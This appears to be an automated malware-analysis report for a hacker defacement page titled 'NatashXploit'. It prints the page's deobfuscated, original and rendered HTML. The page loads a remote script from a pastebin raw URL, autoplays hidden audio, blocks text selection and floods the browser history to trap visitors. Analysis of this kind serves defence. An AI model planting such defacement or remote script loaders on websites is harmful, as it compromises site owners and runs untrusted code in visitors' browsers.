PHP Malware Analysis
xxxx.html
md5: 6fdc1e89ed0a881ffb39a69a544a8a58
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Title
- NatashXploit (Deobfuscated, HTML, Original)
URLs
- https://c.top4top.io/p_1513avyg20.png (Deobfuscated, HTML, Original)
- https://pastebin.com/raw/ynL2hpMe (Deobfuscated, HTML, Original)
- https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/143733046 (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<html>
<head>
<title>NatashXploit</title>
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta name="google-site-verificat,ion" content="MMT"/>
<meta name="theme-color" content="green"> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/>
<meta name="description" content="I'm Cheater">
<meta name="author" content="Cheater"/>
<meta name="keywords" content="Cheater"/>
<meta name="googlebot" content="all"/>
<meta name="robots" content="all" />
<meta name="googlebot-news" content="all" />
<meta name="google" content="notranslate"/> <meta name="og:title" content="Cheater"/>
<meta property="og:site_name" content="https://c.top4top.io/p_1513avyg20.png"> <meta property="og:image" content="https://c.top4top.io/p_1513avyg20.png" />
<meta property="og:type" content="website" />
<meta property="og:updated_time" content="1440432930" />
</span> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe">
</script>
</head>
<style type="text/css"> @import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:#000; } i{ margin:10px; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: Shadows Into Light , cursive; font-size:50px; margin:0px; padding:0px; animation:lamerkaratan 0.5s linear infinite; } #pojok{ position:absolute; bottom:0px; right:0px; } pre{ color:white; } marquee{ width:100%; } @keyframes lamerkaratan{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style> <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">
<embed src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/143733046" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script>
<center><h1><font color="green">Cheat? yes, I'm</font> Cheater!!</h1></body>
</html>Execution traces
Generated HTML code
<html><head>
<title>NatashXploit</title>
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta name="google-site-verificat,ion" content="MMT">
<meta name="theme-color" content="green"> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254">
<meta name="description" content="I'm Cheater">
<meta name="author" content="Cheater">
<meta name="keywords" content="Cheater">
<meta name="googlebot" content="all">
<meta name="robots" content="all">
<meta name="googlebot-news" content="all">
<meta name="google" content="notranslate"> <meta name="og:title" content="Cheater">
<meta property="og:site_name" content="https://c.top4top.io/p_1513avyg20.png"> <meta property="og:image" content="https://c.top4top.io/p_1513avyg20.png">
<meta property="og:type" content="website">
<meta property="og:updated_time" content="1440432930">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe">
</script>
<style type="text/css"> @import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:#000; } i{ margin:10px; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: Shadows Into Light , cursive; font-size:50px; margin:0px; padding:0px; animation:lamerkaratan 0.5s linear infinite; } #pojok{ position:absolute; bottom:0px; right:0px; } pre{ color:white; } marquee{ width:100%; } @keyframes lamerkaratan{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style></head>
<body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">
<embed src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/143733046" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script>
<center><h1><font color="green">Cheat? yes, I'm</font> Cheater!!</h1>
</center></body></html>Original PHP code
<html>
<head>
<title>NatashXploit</title>
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta name="google-site-verificat,ion" content="MMT"/>
<meta name="theme-color" content="green"> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/>
<meta name="description" content="I'm Cheater">
<meta name="author" content="Cheater"/>
<meta name="keywords" content="Cheater"/>
<meta name="googlebot" content="all"/>
<meta name="robots" content="all" />
<meta name="googlebot-news" content="all" />
<meta name="google" content="notranslate"/> <meta name="og:title" content="Cheater"/>
<meta property="og:site_name" content="https://c.top4top.io/p_1513avyg20.png"> <meta property="og:image" content="https://c.top4top.io/p_1513avyg20.png" />
<meta property="og:type" content="website" />
<meta property="og:updated_time" content="1440432930" />
</span> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe">
</script>
</head>
<style type="text/css"> @import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:#000; } i{ margin:10px; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: Shadows Into Light , cursive; font-size:50px; margin:0px; padding:0px; animation:lamerkaratan 0.5s linear infinite; } #pojok{ position:absolute; bottom:0px; right:0px; } pre{ color:white; } marquee{ width:100%; } @keyframes lamerkaratan{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style> <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">
<embed src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/143733046" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script>
<center><h1><font color="green">Cheat? yes, I'm</font> Cheater!!</h1></body>
</html>